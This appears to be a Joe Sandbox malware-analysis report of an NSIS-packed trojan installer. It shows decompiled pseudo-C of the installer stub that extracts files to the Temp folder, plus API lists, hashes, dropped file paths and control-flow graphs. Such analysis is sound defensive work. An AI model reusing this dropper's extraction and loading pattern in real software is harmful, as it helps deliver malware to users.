            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				signed int _v40;
            				short _v560;
            				long _t54;
            				void* _t57;
            				void* _t61;
            				intOrPtr _t64;
            				void* _t67;
            				intOrPtr* _t69;
            				long _t81;
            				signed int _t88;
            				intOrPtr _t91;
            				void* _t94;
            				void* _t99;
            				void* _t103;
            				long _t104;
            				long _t107;
            				void* _t108;
            
            				_v8 = 0;
            				_v12 = 0;
            				 *0x7a8aac = GetTickCount() + 0x3e8;
            				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x400);
            				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x80000000, 3);
            				 *0x40a018 = _t103;
            				if(_t103 == 0xffffffff) {
            					return L"Error launching installer";
            				}
            				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe");
            				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
            				_t54 = GetFileSize(_t103, 0);
            				 *0x79f740 = _t54;
            				_t107 = _t54;
            				if(_t54 <= 0) {
            					L22:
            					E0040302E(1);
            					_pop(_t94);
            					if( *0x7a8ab4 == 0) {
            						goto L30;
            					}
            					if(_v12 == 0) {
            						L26:
            						_t57 = GlobalAlloc(0x40, _v20); // executed
            						_t108 = _t57;
            						 *0x40ce78 = 0xb;
            						 *0x40ce90 = 0; // executed
            						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
            						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
            						 *0x40a01c = _t61;
            						if(_t61 != 0xffffffff) {
            							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
            							 *0x79f744 = _t64;
            							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
            							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
            							if(_t67 == _v20) {
            								 *0x7a8ab0 = _t108;
            								 *0x7a8ab8 =  *_t108;
            								if((_v40 & 0x00000001) != 0) {
            									 *0x7a8abc =  *0x7a8abc + 1;
            								}
            								_t45 = _t108 + 0x44; // 0x44
            								_t69 = _t45;
            								_t99 = 8;
            								do {
            									_t69 = _t69 - 8;
            									 *_t69 =  *_t69 + _t108;
            									_t99 = _t99 - 1;
            								} while (_t99 != 0);
            								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
            								E00406119(0x7a8ac0, _t108 + 4, 0x40);
            								return 0;
            							}
            							goto L30;
            						}
            						return L"Error writing temporary file. Make sure your temp folder is valid.";
            					}
            					E004035FE( *0x79f730);
            					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
            						goto L30;
            					} else {
            						goto L26;
            					}
            				} else {
            					do {
            						_t104 = _t107;
            						asm("sbb eax, eax");
            						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
            						if(_t107 >= _t81) {
            							_t104 = _t81;
            						}
            						if(E004035E8(0x797730, _t104) == 0) {
            							E0040302E(1);
            							L30:
            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
            						}
            						if( *0x7a8ab4 != 0) {
            							if((_a4 & 0x00000002) == 0) {
            								E0040302E(0);
            							}
            							goto L19;
            						}
            						E00406119( &_v40, 0x797730, 0x1c);
            						_t88 = _v40;
            						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
            							_a4 = _a4 | _t88;
            							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
            							_t91 = _v16;
            							 *0x7a8ab4 =  *0x79f730;
            							if(_t91 > _t107) {
            								goto L30;
            							}
            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
            								_v12 = _v12 + 1;
            								_t107 = _t91 - 4;
            								if(_t104 > _t107) {
            									_t104 = _t107;
            								}
            								goto L19;
            							} else {
            								goto L22;
            							}
            						}
            						L19:
            						if(_t107 <  *0x79f740) {
            							_v8 = E00406B28(_v8, 0x797730, _t104);
            						}
            						 *0x79f730 =  *0x79f730 + _t104;
            						_t107 = _t107 - _t104;
            					} while (_t107 != 0);
            					goto L22;
            				}
            			}




























            0x004030de
            0x004030e1
            0x004030fb
            0x00403100
            0x00403113
            0x00403118
            0x0040311e
            0x00000000
            0x00403120
            0x00403131
            0x00403142
            0x00403149
            0x00403151
            0x00403156
            0x00403158
            0x00403246
            0x00403248
            0x00403253
            0x00403254
            0x00000000
            0x00000000
            0x0040325d
            0x00403289
            0x0040328e
            0x00403294
            0x004032a2
            0x004032a9
            0x004032af
            0x004032ca
            0x004032d3
            0x004032d8
            0x004032f7
            0x00403307
            0x00403319
            0x0040331e
            0x00403326
            0x00403333
            0x0040333b
            0x00403340
            0x00403342
            0x00403342
            0x0040334a
            0x0040334a
            0x0040334d
            0x0040334e
            0x0040334e
            0x00403351
            0x00403353
            0x00403353
            0x0040335d
            0x00403369
            0x00000000
            0x0040336e
            0x00000000
            0x00403326
            0x00000000
            0x004032da
            0x00403265
            0x00403277
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040315e
            0x0040315e
            0x00403163
            0x00403167
            0x0040316e
            0x00403175
            0x00403177
            0x00403177
            0x00403186
            0x004032e6
            0x00403328
            0x00000000
            0x00403328
            0x00403192
            0x00403216
            0x00403219
            0x0040321e
            0x00000000
            0x00403216
            0x0040319f
            0x004031a4
            0x004031ac
            0x004031d2
            0x004031e1
            0x004031e7
            0x004031ec
            0x004031f2
            0x00000000
            0x00000000
            0x004031fc
            0x00403204
            0x00403207
            0x0040320c
            0x0040320e
            0x0040320e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004031fc
            0x0040321f
            0x00403225
            0x00403235
            0x00403235
            0x00403238
            0x0040323e
            0x0040323e
            0x00000000
            0x0040315e

            APIs
            • GetTickCount.KERNEL32 ref: 004030E4
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,00000400), ref: 00403100
              • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
              • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00403149
            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
            • API String ID: 2803837635-714021740
            • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
            • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
            • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
            • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
            C-Code - Quality: 77%
            			E0040176F(FILETIME* __ebx, void* __eflags) {
            				void* __esi;
            				void* _t35;
            				void* _t43;
            				void* _t45;
            				FILETIME* _t51;
            				FILETIME* _t64;
            				void* _t66;
            				signed int _t72;
            				FILETIME* _t73;
            				FILETIME* _t77;
            				signed int _t79;
            				WCHAR* _t81;
            				void* _t83;
            				void* _t84;
            				void* _t86;
            
            				_t77 = __ebx;
            				 *(_t86 - 8) = E00402DA6(0x31);
            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
            				_t35 = E00405FB4( *(_t86 - 8));
            				_push( *(_t86 - 8));
            				_t81 = L"C:\\U";
            				if(_t35 == 0) {
            					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
            				} else {
            					E0040666E();
            				}
            				E004068F5(_t81);
            				while(1) {
            					__eflags =  *(_t86 + 8) - 3;
            					if( *(_t86 + 8) >= 3) {
            						_t66 = E004069A4(_t81);
            						_t79 = 0;
            						__eflags = _t66 - _t77;
            						if(_t66 != _t77) {
            							_t73 = _t66 + 0x14;
            							__eflags = _t73;
            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
            						}
            						asm("sbb eax, eax");
            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
            						__eflags = _t72;
            						 *(_t86 + 8) = _t72;
            					}
            					__eflags =  *(_t86 + 8) - _t77;
            					if( *(_t86 + 8) == _t77) {
            						E00406139(_t81);
            					}
            					__eflags =  *(_t86 + 8) - 1;
            					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
            					__eflags = _t43 - 0xffffffff;
            					 *(_t86 - 0x38) = _t43;
            					if(_t43 != 0xffffffff) {
            						break;
            					}
            					__eflags =  *(_t86 + 8) - _t77;
            					if( *(_t86 + 8) != _t77) {
            						E004056D0(0xffffffe2,  *(_t86 - 8));
            						__eflags =  *(_t86 + 8) - 2;
            						if(__eflags == 0) {
            							 *((intOrPtr*)(_t86 - 4)) = 1;
            						}
            						L31:
            						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
            						__eflags =  *0x7a8b28;
            						goto L32;
            					} else {
            						E0040666E(0x40b5f8, _t83);
            						E0040666E(_t83, _t81);
            						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
            						E0040666E(_t83, 0x40b5f8);
            						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
            						__eflags = _t64;
            						if(_t64 == 0) {
            							continue;
            						} else {
            							__eflags = _t64 == 1;
            							if(_t64 == 1) {
            								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
            								L32:
            								_t51 = 0;
            								__eflags = 0;
            							} else {
            								_push(_t81);
            								_push(0xfffffffa);
            								E004056D0();
            								L29:
            								_t51 = 0x7fffffff;
            							}
            						}
            					}
            					L33:
            					return _t51;
            				}
            				E004056D0(0xffffffea,  *(_t86 - 8));
            				 *0x7a8b54 =  *0x7a8b54 + 1;
            				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
            				 *0x7a8b54 =  *0x7a8b54 - 1;
            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
            				_t84 = _t45;
            				if( *(_t86 - 0x24) != 0xffffffff) {
            					L22:
            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
            				} else {
            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
            						goto L22;
            					}
            				}
            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
            				__eflags = _t84 - _t77;
            				if(_t84 >= _t77) {
            					goto L31;
            				} else {
            					__eflags = _t84 - 0xfffffffe;
            					if(_t84 != 0xfffffffe) {
            						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
            					} else {
            						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
            						lstrcatW(_t81,  *(_t86 - 8));
            					}
            					_push(0x200010);
            					_push(_t81);
            					E00405CCE();
            					goto L29;
            				}
            				goto L33;
            			}


















            0x0040176f
            0x00401776
            0x00401782
            0x00401785
            0x0040178a
            0x0040178d
            0x00401794
            0x004017b0
            0x00401796
            0x00401797
            0x00401797
            0x004017b6
            0x004017bb
            0x004017bb
            0x004017bf
            0x004017c2
            0x004017c7
            0x004017c9
            0x004017cb
            0x004017d0
            0x004017d0
            0x004017db
            0x004017db
            0x004017ec
            0x004017ee
            0x004017ee
            0x004017ef
            0x004017ef
            0x004017f2
            0x004017f5
            0x004017f8
            0x004017f8
            0x004017ff
            0x0040180e
            0x00401813
            0x00401816
            0x00401819
            0x00000000
            0x00000000
            0x0040181b
            0x0040181e
            0x00401874
            0x00401879
            0x004015b6
            0x0040292e
            0x0040292e
            0x00402c2a
            0x00402c2d
            0x00402c2d
            0x00000000
            0x00401820
            0x00401826
            0x0040182d
            0x0040183a
            0x00401845
            0x0040185b
            0x0040185b
            0x0040185e
            0x00000000
            0x00401864
            0x00401864
            0x00401865
            0x00401882
            0x00402c33
            0x00402c33
            0x00402c33
            0x00401867
            0x00401867
            0x00401868
            0x00401493
            0x0040239d
            0x0040239d
            0x0040239d
            0x00401865
            0x0040185e
            0x00402c35
            0x00402c39
            0x00402c39
            0x00401892
            0x00401897
            0x004018a5
            0x004018aa
            0x004018b0
            0x004018b4
            0x004018b6
            0x004018be
            0x004018ca
            0x004018b8
            0x004018b8
            0x004018bc
            0x00000000
            0x00000000
            0x004018bc
            0x004018d3
            0x004018d9
            0x004018db
            0x00000000
            0x004018e1
            0x004018e1
            0x004018e4
            0x004018fc
            0x004018e6
            0x004018e9
            0x004018f2
            0x004018f2
            0x00401901
            0x00401906
            0x00402398
            0x00000000
            0x00402398
            0x00000000

            APIs
            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,00000000,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
              • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
              • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
              • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
              • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
            • API String ID: 1941528284-3542872641
            • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
            • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
            • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
            • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 520 40347f-4034a7 GetTickCount 521 4035d7-4035df call 40302e 520->521 522 4034ad-4034d8 call 4035fe SetFilePointer 520->522 527 4035e1-4035e5 521->527 528 4034dd-4034ef 522->528 529 4034f1 528->529 530 4034f3-403501 call 4035e8 528->530 529->530 533 403507-403513 530->533 534 4035c9-4035cc 530->534 535 403519-40351f 533->535 534->527 536 403521-403527 535->536 537 40354a-403566 call 406b96 535->537 536->537 538 403529-403549 call 40302e 536->538 543 4035d2 537->543 544 403568-403570 537->544 538->537 545 4035d4-4035d5 543->545 546 403572-40357a call 406210 544->546 547 403593-403599 544->547 545->527 551 40357f-403581 546->551 547->543 548 40359b-40359d 547->548 548->543 550 40359f-4035b2 548->550 550->528 552 4035b8-4035c7 SetFilePointer 550->552 553 403583-40358f 551->553 554 4035ce-4035d0 551->554 552->521 553->535 555 403591 553->555 554->545 555->550
            C-Code - Quality: 93%
            			E0040347F(intOrPtr _a4) {
            				intOrPtr _t11;
            				signed int _t12;
            				void* _t15;
            				long _t16;
            				void* _t18;
            				intOrPtr _t30;
            				intOrPtr _t33;
            				intOrPtr _t35;
            				void* _t36;
            				intOrPtr _t48;
            
            				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
            				 *0x7a8aac = GetTickCount() + 0x1f4;
            				if(_t33 <= 0) {
            					L22:
            					E0040302E(1);
            					return 0;
            				}
            				E004035FE( *0x79f744);
            				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
            				 *0x79f740 = _t33;
            				 *0x79f730 = 0;
            				while(1) {
            					_t30 = 0x4000;
            					_t11 =  *0x79f738 -  *0x79f744;
            					if(_t11 <= 0x4000) {
            						_t30 = _t11;
            					}
            					_t12 = E004035E8(0x793730, _t30);
            					if(_t12 == 0) {
            						break;
            					}
            					 *0x79f744 =  *0x79f744 + _t30;
            					 *0x40ce68 = 0x793730;
            					 *0x40ce6c = _t30;
            					L6:
            					L6:
            					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
            						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
            						E0040302E(0);
            					}
            					 *0x40ce70 = 0x78b730;
            					 *0x40ce74 = 0x8000;
            					if(E00406B96(?str?) < 0) {
            						goto L20;
            					}
            					_t35 =  *0x40ce70; // 0x78e728
            					_t36 = _t35 - 0x78b730;
            					if(_t36 == 0) {
            						__eflags =  *0x40ce6c; // 0x0
            						if(__eflags != 0) {
            							goto L20;
            						}
            						__eflags = _t30;
            						if(_t30 == 0) {
            							goto L20;
            						}
            						L16:
            						_t16 =  *0x79f734;
            						if(_t16 -  *0x40ce60 + _a4 > 0) {
            							continue;
            						}
            						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
            						goto L22;
            					}
            					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
            					if(_t18 == 0) {
            						_push(0xfffffffe);
            						L21:
            						_pop(_t15);
            						return _t15;
            					}
            					 *0x40ce60 =  *0x40ce60 + _t36;
            					_t48 =  *0x40ce6c; // 0x0
            					if(_t48 != 0) {
            						goto L6;
            					}
            					goto L16;
            					L20:
            					_push(0xfffffffd);
            					goto L21;
            				}
            				return _t12 | 0xffffffff;
            			}













            0x0040348f
            0x004034a2
            0x004034a7
            0x004035d7
            0x004035d9
            0x00000000
            0x004035df
            0x004034b3
            0x004034c6
            0x004034cc
            0x004034d2
            0x004034dd
            0x004034e2
            0x004034e7
            0x004034ef
            0x004034f1
            0x004034f1
            0x004034fa
            0x00403501
            0x00000000
            0x00000000
            0x00403507
            0x0040350d
            0x00403513
            0x00000000
            0x00403519
            0x0040351f
            0x0040353f
            0x00403544
            0x00403549
            0x0040354f
            0x00403555
            0x00403566
            0x00000000
            0x00000000
            0x00403568
            0x0040356e
            0x00403570
            0x00403593
            0x00403599
            0x00000000
            0x00000000
            0x0040359b
            0x0040359d
            0x00000000
            0x00000000
            0x0040359f
            0x0040359f
            0x004035b2
            0x00000000
            0x00000000
            0x004035c1
            0x00000000
            0x004035c1
            0x0040357a
            0x00403581
            0x004035ce
            0x004035d4
            0x004035d4
            0x00000000
            0x004035d4
            0x00403583
            0x00403589
            0x0040358f
            0x00000000
            0x00000000
            0x00000000
            0x004035d2
            0x004035d2
            0x00000000
            0x004035d2
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 00403493
              • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
            • SetFilePointer.KERNELBASE(?,00000000,00000000,0jy,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FilePointer$CountTick
            • String ID: (x$07y$0jy
            • API String ID: 1092082344-2769961627
            • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
            • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
            • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
            • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 556 4069cb-4069eb GetSystemDirectoryW 557 4069ed 556->557 558 4069ef-4069f1 556->558 557->558 559 406a02-406a04 558->559 560 4069f3-4069fc 558->560 562 406a05-406a38 wsprintfW LoadLibraryExW 559->562 560->559 561 4069fe-406a00 560->561 561->562
            C-Code - Quality: 100%
            			E004069CB(intOrPtr _a4) {
            				short _v576;
            				signed int _t13;
            				struct HINSTANCE__* _t17;
            				signed int _t19;
            				void* _t24;
            
            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
            				if(_t13 > 0x104) {
            					_t13 = 0;
            				}
            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
            					_t19 = 1;
            				} else {
            					_t19 = 0;
            				}
            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
            				return _t17;
            			}








            0x004069e2
            0x004069eb
            0x004069ed
            0x004069ed
            0x004069f1
            0x00406a04
            0x004069fe
            0x004069fe
            0x004069fe
            0x00406a1d
            0x00406a31
            0x00406a38

            APIs
            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
            • wsprintfW.USER32 ref: 00406A1D
            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
